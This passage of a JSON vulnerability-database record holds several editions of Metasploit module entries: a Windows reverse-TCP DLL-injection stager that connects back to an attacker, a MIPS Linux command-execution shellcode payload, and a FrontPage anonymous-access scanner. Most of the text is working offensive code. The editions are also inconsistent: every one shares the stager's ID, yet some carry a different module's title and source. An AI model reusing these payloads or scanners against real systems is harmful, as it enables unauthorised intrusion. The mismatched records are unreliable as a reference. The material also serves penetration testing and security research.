"Inject a custom DLL into the exploited process. 
Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-25T08:29:47", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 4.5, "vector": "NONE", "modified": "2019-07-25T08:29:47"}, "dependencies": {"references": [{"type": "pentestit", "idList": ["PENTESTIT:3699C81C5F2D75668446A68245CA8BA5"]}, {"type": "kitploit", "idList": ["KITPLOIT:1521717899068290187"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:89070BA9467D02F1834CE0214BB8B605"]}, {"type": "cve", "idList": ["CVE-2019-3622", "CVE-2019-3591", "CVE-2019-2799", "CVE-2019-11694", "CVE-2019-9818", "CVE-2019-11700", "CVE-2019-11702"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:353CB4603C296A43DDDDDAE6CAC6BE25"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142659", "OPENVAS:1361412562310142653", "OPENVAS:1361412562310142655", "OPENVAS:1361412562310142657", "OPENVAS:1361412562310142651"]}, {"type": "exploitdb", "idList": ["EDB-ID:47152"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995204"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:3A2630BDE36D76A2AD8878BA46386B1A"]}, {"type": "threatpost", "idList": ["THREATPOST:5049F818B995E5121EDA184A34A957E6"]}], "modified": "2019-07-25T08:29:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n 
\"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-25T08:29:47", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 15}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "27761625e2013c3793ab37542c842490", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Execute Command", "description": "A very small shellcode for executing commands. This module is sometimes helpful for testing purposes as well as on targets with extremely limited buffer space.\n", "published": "2014-03-25T08:13:04", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-02T21:09:03", "history": [], "viewCount": 12, "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2019-08-02T21:09:03"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:3061567718276015390", "KITPLOIT:6930354079971299568"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:CBFA94FEB0D96919B90754C4C536B7E3"]}, {"type": "exploitdb", "idList": ["EDB-ID:47205", "EDB-ID:47199"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153863", "PACKETSTORM:153864", "PACKETSTORM:153860", "PACKETSTORM:153855"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F3647F72A71A1ABB510DB822FEC6350D"]}, {"type": "threatpost", "idList": 
["THREATPOST:4AFE6ED4AD0DE5F2A6D9EB6F8B200F8C", "THREATPOST:EEEF0864C058C745F05E1162FFDA2FEF", "THREATPOST:CD8C86559669AF2DDA3C15C5907E2CEC"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142687", "OPENVAS:1361412562310142689", "OPENVAS:1361412562310108614"]}, {"type": "mssecure", "idList": ["MSSECURE:1F9805F02A073724B9F63E0197C2A8D2"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:85F42CE87D147D8C6C9E65BF502F9B82"]}], "modified": "2019-08-02T21:09:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/mipsle/exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nmodule MetasploitModule\n\n CachedSize = 52\n\n include Msf::Payload::Single\n include Msf::Payload::Linux\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Linux Execute Command',\n 'Description' => %q{\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.\n },\n 'Author' =>\n [\n 'Michael Messner <devnull[at]s3cur1ty.de>', #metasploit payload\n 'entropy@phiral.net' #original payload\n ],\n 'References' =>\n [\n ['EDB', '17940']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPSLE,\n 'Payload' =>\n {\n 'Offsets' => {} ,\n 'Payload' => ''\n })\n )\n register_options(\n [\n OptString.new('CMD', [ true, \"The command string to execute\" ]),\n ])\n end\n\n #\n # Returns the command string to use for execution\n #\n def command_string\n return datastore['CMD'] || ''\n end\n\n def generate\n\n shellcode =\n \"\\x66\\x06\\x06\\x24\" + # li a2,1638\n \"\\xff\\xff\\xd0\\x04\" + # bltzal a2,4100b4\n \"\\xff\\xff\\x06\\x28\" + # slti a2,zero,-1\n \"\\xe0\\xff\\xbd\\x27\" + # 
addiu sp,sp,-32\n \"\\x01\\x10\\xe4\\x27\" + # addiu a0,ra,4097\n \"\\x1f\\xf0\\x84\\x24\" + # addiu a0,a0,-4065\n \"\\xe8\\xff\\xa4\\xaf\" + # sw a0,-24(sp)\n \"\\xec\\xff\\xa0\\xaf\" + # sw zero,-20(sp)\n \"\\xe8\\xff\\xa5\\x27\" + # addiu a1,sp,-24\n \"\\xab\\x0f\\x02\\x24\" + # li v0,4011\n \"\\x0c\\x01\\x01\\x01\" # syscall 0x40404\n\n #\n # Constructs the payload\n #\n\n shellcode = shellcode + command_string + \"\\x00\"\n\n # we need to align our shellcode to 4 bytes\n (shellcode = shellcode + \"\\x00\") while shellcode.length%4 != 0\n\n return super + shellcode\n\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-02T21:09:03", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 16}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. 
Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-02T23:16:01", "history": [], "viewCount": 12, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2019-08-02T23:16:01"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:3061567718276015390", "KITPLOIT:6930354079971299568"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "TALOSBLOG:CBFA94FEB0D96919B90754C4C536B7E3"]}, {"type": "exploitdb", "idList": ["EDB-ID:47205", "EDB-ID:47199"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153864", "PACKETSTORM:153863", "PACKETSTORM:153860", "PACKETSTORM:153855"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F3647F72A71A1ABB510DB822FEC6350D"]}, {"type": "threatpost", "idList": ["THREATPOST:4AFE6ED4AD0DE5F2A6D9EB6F8B200F8C", "THREATPOST:EEEF0864C058C745F05E1162FFDA2FEF", "THREATPOST:CD8C86559669AF2DDA3C15C5907E2CEC"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142687", "OPENVAS:1361412562310142689", "OPENVAS:1361412562310108614"]}, {"type": "mssecure", "idList": ["MSSECURE:1F9805F02A073724B9F63E0197C2A8D2"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:85F42CE87D147D8C6C9E65BF502F9B82"]}], "modified": "2019-08-02T23:16:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n 
include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-02T23:16:01", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 17}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "8ed6993d58c7a1cbc32d1325e51fbf83", "type": "metasploit", "bulletinFamily": "exploit", "title": "FrontPage Server Extensions Anonymous Login Scanner", "description": "This module queries the FrontPage Server Extensions and determines whether anonymous access is allowed.\n", "published": "2010-06-21T16:53:52", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://en.wikipedia.org/wiki/Microsoft_FrontPage", "http://msdn2.microsoft.com/en-us/library/ms454298.aspx"], "cvelist": [], "lastseen": "2019-08-12T12:06:49", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 2.2, "vector": "NONE", "modified": "2019-08-12T12:06:49"}, "dependencies": {"references": [{"type": "securelist", "idList": ["SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1"]}, {"type": "avleonov", "idList": ["AVLEONOV:7118D192A9C9CA57E19AF24D8D28CC8C"]}, {"type": "cve", "idList": ["CVE-2019-14935", "CVE-2019-3744"]}, {"type": "kitploit", "idList": ["KITPLOIT:4030290907877314351", "KITPLOIT:2014576974660698399", "KITPLOIT:8472655692165406438"]}, 
{"type": "thn", "idList": ["THN:D91EA96B102BA7DD88D4AF503A1D6FF1"]}, {"type": "threatpost", "idList": ["THREATPOST:460C81C21FE14019A2DC4247EC2BE34F"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:C2E5C3C0350F1BCAB63AA34F6A0BDAF8"]}, {"type": "pentestit", "idList": ["PENTESTIT:2ACE08D4C61B2001FC9ADF11D2E664F2"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:97788CF611A6F5212E2559FF0538EA36"]}, {"type": "talosblog", "idList": ["TALOSBLOG:62182E90D88C9282869F40D834CA56BA"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1840-1"]}, {"type": "mssecure", "idList": ["MSSECURE:D3A43D05FA99A2B0DC1C165936D863A4", "MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9"]}, {"type": "schneier", "idList": ["SCHNEIER:F626C5B0C5ACFD28C246FE6D819DE037"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815270"]}, {"type": "exploitdb", "idList": ["EDB-ID:47215", "EDB-ID:47217"]}], "modified": "2019-08-12T12:06:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/frontpage_login.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::WmapScanServer\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n\n def initialize\n super(\n 'Name' => 'FrontPage Server Extensions Anonymous Login Scanner',\n 'Description' => 'This module queries the FrontPage Server Extensions and determines whether anonymous access is allowed.',\n 'References' =>\n [\n ['URL', 'http://en.wikipedia.org/wiki/Microsoft_FrontPage'],\n ['URL', 'http://msdn2.microsoft.com/en-us/library/ms454298.aspx'],\n ],\n 'Author' => 'Matteo Cantoni <goony[at]nothink.org>',\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptString.new('UserAgent', [ true, \"The HTTP 
User-Agent sent in the request\", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ])\n ])\n end\n\n def run_host(target_host)\n\n if datastore['RPORT'].to_i == 80 or datastore['RPORT'].to_i == 443\n port = \"\"\n else\n port = \":\" + datastore['RPORT'].to_s\n end\n\n info = (datastore['SSL'] ? \"https\" : \"http\") + \"://#{target_host}#{port}/\"\n\n connect\n\n sock.put(\"GET /_vti_inf.html HTTP/1.1\\r\\n\" + \"TE: deflate,gzip;q=0.3\\r\\n\" + \"Keep-Alive: 300\\r\\n\" +\n \"Connection: Keep-Alive, TE\\r\\n\" + \"Host: #{vhost}\\r\\n\" + \"User-Agent: \" +\n datastore['UserAgent'] + \"\\r\\n\\r\\n\")\n\n res = sock.get_once || ''\n\n disconnect\n\n if (res.match(/HTTP\\/1.1 200 OK/))\n if (res.match(/Server: (.*)/))\n server_version = $1\n print_status(\"#{info} is running #{server_version}\")\n end\n if (fpversion = res.match(/FPVersion=\"(.*)\"/))\n fpversion = $1\n print_status(\"#{info} FrontPage Version: #{fpversion}\")\n\n if (fpauthor = res.match(/FPAuthorScriptUrl=\"([^\"]*)/))\n fpauthor = $1\n print_status(\"#{info} FrontPage Author: #{info}#{fpauthor}\")\n # Add Report\n opts = {\n :host => target_host,\n :proto => 'tcp',\n :sname => (ssl ? 
'https' : 'http'),\n :type => 'FrontPage Author',\n :data => \"#{info}#{fpauthor}\"\n }\n opts[:port] = datastore['RPORT'] if not port.empty?\n report_note(opts)\n end\n check_account(info, fpversion, target_host)\n end\n else\n print_status(\"#{info} may not support FrontPage Server Extensions\")\n end\n end\n\n def check_account(info, fpversion, target_host)\n\n return if not fpversion\n\n connect\n\n # http://msdn2.microsoft.com/en-us/library/ms454298.aspx\n method = \"method=open+service:#{fpversion}&service_name=/\"\n\n req = \"POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\\r\\n\" + \"TE: deflate,gzip;q=0.3\\r\\n\" +\n \"Keep-Alive: 300\\r\\n\" + \"Connection: Keep-Alive, TE\\r\\n\" + \"Host: #{vhost}\\r\\n\" +\n \"User-Agent: \" + datastore['UserAgent'] + \"\\r\\n\" + \"Content-Type: application/x-www-form-urlencoded\\r\\n\" +\n \"X-Vermeer-Content-Type: application/x-www-form-urlencoded\" + \"\\r\\n\" +\n \"Content-Length: #{method.length}\\r\\n\\r\\n\" + method + \"\\r\\n\\r\\n\"\n\n sock.put(req)\n res = sock.get_once\n\n if(res and res.match(/^HTTP\\/1\\.[01]\\s+([^\\s]+)\\s+(.*)/))\n retcode = $1\n retmsg = $2.strip\n\n if(retcode == \"100\")\n ## Sometimes doesn't work !!!!!!!!!!!!!!!\n res = sock.get_once\n if(res and res.match(/^HTTP\\/1\\.[01]\\s+([^\\s]+)\\s+(.*)/))\n retcode = $1\n retmsg = $2.strip\n end\n end\n\n\n case retcode\n when /^200/\n print_good(\"#{info} FrontPage ACCESS ALLOWED [#{retcode}]\")\n # Report a note or vulnerability or something\n # Not really this one, but close\n report_vuln(\n {\n :host => target_host,\n :port\t=> rport,\n :proto\t=> 'tcp',\n :name\t=> self.name,\n :info => \"Module #{self.fullname} confirmed access to #{info} [#{retcode}]\",\n :refs => self.references,\n :exploited_at => Time.now.utc\n }\n )\n when /^401/\n print_error(\"#{info} FrontPage Password Protected [#{retcode}]\")\n when /^403/\n print_error(\"#{info} FrontPage Authoring Disabled [#{retcode}]\")\n when /^404/\n print_error(\"#{info} FrontPage 
Improper Installation [#{retcode}]\")\n when /^500/\n print_error(\"#{info} FrontPage Server Error [#{retcode}]\")\n else\n print_error(\"#{info} FrontPage Unknown Response [#{retcode}]\")\n end\n end\n\n disconnect\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-12T12:06:49", "differentElements": ["description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 18}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-12T14:15:51", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.0, "vector": "NONE", "modified": "2019-08-12T14:15:51"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:160B78DA9DED13269935117A5A1A2116", "THREATPOST:460C81C21FE14019A2DC4247EC2BE34F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:093A2C20ABB73E8F3B405825CCFCA04E", "CARBONBLACK:97788CF611A6F5212E2559FF0538EA36"]}, {"type": "securelist", "idList": ["SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1"]}, {"type": "avleonov", "idList": ["AVLEONOV:7118D192A9C9CA57E19AF24D8D28CC8C"]}, {"type": "cve", "idList": ["CVE-2019-14935", "CVE-2019-3744"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995484"]}, {"type": "kitploit", "idList": ["KITPLOIT:4030290907877314351", "KITPLOIT:2014576974660698399"]}, {"type": "thn", "idList": ["THN:D91EA96B102BA7DD88D4AF503A1D6FF1"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:C2E5C3C0350F1BCAB63AA34F6A0BDAF8"]}, {"type": "pentestit", 
"idList": ["PENTESTIT:2ACE08D4C61B2001FC9ADF11D2E664F2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:62182E90D88C9282869F40D834CA56BA"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142724"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1840-1"]}, {"type": "mssecure", "idList": ["MSSECURE:D3A43D05FA99A2B0DC1C165936D863A4", "MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9"]}, {"type": "schneier", "idList": ["SCHNEIER:F626C5B0C5ACFD28C246FE6D819DE037"]}], "modified": "2019-08-12T14:15:51"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-12T14:15:51", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "782981c5f3ef7ed2032227c6b3eba8ad", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", 
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-13T14:57:58", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 4.1, "vector": "NONE", "modified": "2019-08-13T14:57:58"}, "dependencies": {"references": [{"type": "carbonblack", "idList": ["CARBONBLACK:08DFDF365CEC9A8343CADCDB1558BB52", "CARBONBLACK:093A2C20ABB73E8F3B405825CCFCA04E", "CARBONBLACK:97788CF611A6F5212E2559FF0538EA36"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995512", "MYHACK58:62201995484"]}, {"type": "vulnerlab", "idList": ["VULNERLAB:2188"]}, {"type": "exploitdb", "idList": ["EDB-ID:47244", "EDB-ID:47243", "EDB-ID:47238", "EDB-ID:47221"]}, {"type": "pentestit", "idList": ["PENTESTIT:E916C1A44B48C516ACEB7CD502F616DE"]}, {"type": "amazon", "idList": ["ALAS-2019-1257", "ALAS-2019-1253"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:8A4460ED43B01CB44E7A22E2A6A7ACB1"]}, {"type": "threatpost", "idList": ["THREATPOST:160B78DA9DED13269935117A5A1A2116"]}, {"type": "securelist", "idList": ["SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1"]}, {"type": "avleonov", "idList": ["AVLEONOV:7118D192A9C9CA57E19AF24D8D28CC8C"]}, {"type": "cve", "idList": ["CVE-2019-14935"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154018", "PACKETSTORM:154026"]}], "modified": "2019-08-13T14:57:58"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule 
MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-13T14:57:58", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "a8907dd1e55f721e656ff85b6a3b6f27", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "description": "Inject a custom DLL into the exploited process. 
Connect back to the attacker\n", "published": "2013-02-28T07:59:20", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-13T16:20:53", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 4.0, "vector": "NONE", "modified": "2019-08-13T16:20:53"}, "dependencies": {"references": [{"type": "msrc", "idList": ["MSRC:F6451E22C455ECC6A5002C5C7212F8BE"]}, {"type": "mssecure", "idList": ["MSSECURE:A37B6105F34E3E6038A03DD86999F64F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:08DFDF365CEC9A8343CADCDB1558BB52", "CARBONBLACK:093A2C20ABB73E8F3B405825CCFCA04E", "CARBONBLACK:97788CF611A6F5212E2559FF0538EA36"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995512", "MYHACK58:62201995484"]}, {"type": "exploitdb", "idList": ["EDB-ID:47243", "EDB-ID:47244", "EDB-ID:47238"]}, {"type": "vulnerlab", "idList": ["VULNERLAB:2188"]}, {"type": "ics", "idList": ["ICSA-19-225-02"]}, {"type": "pentestit", "idList": ["PENTESTIT:E916C1A44B48C516ACEB7CD502F616DE"]}, {"type": "amazon", "idList": ["ALAS-2019-1257", "ALAS-2019-1253"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:8A4460ED43B01CB44E7A22E2A6A7ACB1"]}, {"type": "threatpost", "idList": ["THREATPOST:160B78DA9DED13269935117A5A1A2116"]}, {"type": "securelist", "idList": ["SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1"]}, {"type": "avleonov", "idList": ["AVLEONOV:7118D192A9C9CA57E19AF24D8D28CC8C"]}, {"type": "cve", "idList": ["CVE-2019-14935"]}], "modified": "2019-08-13T16:20:53"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 
'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-13T16:20:53", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 21}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/REVERSE_TCP_RC4_DNS", "hash": "2fa54dd18729ea70e97b459e7358f138", "type": "metasploit", "bulletinFamily": "exploit", "title": "Ruby Command Shell, Reverse TCP SSL", "description": "Connect back and create a command shell via Ruby, uses SSL\n", "published": "2013-02-03T19:59:15", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-16T09:57:18", "history": [], "viewCount": 12, "enchantments": {"score": {"value": 3.4, "vector": "NONE", "modified": "2019-08-16T09:57:18"}, "dependencies": {"references": [{"type": "thn", "idList": ["THN:878061A73E138AD892EFFB4D6E6F0C11"]}, {"type": "exploitdb", "idList": ["EDB-ID:47280", "EDB-ID:47282", "EDB-ID:47283", "EDB-ID:47278", "EDB-ID:47276", "EDB-ID:47274", "EDB-ID:47279", "EDB-ID:47275", "EDB-ID:47277", "EDB-ID:47273"]}, {"type": "hackread", "idList": ["HACKREAD:796ACB5B55194E34D2B701E163319A43"]}, {"type": "cve", "idList": ["CVE-2019-3974"]}, {"type": "malwarebytes", "idList": 
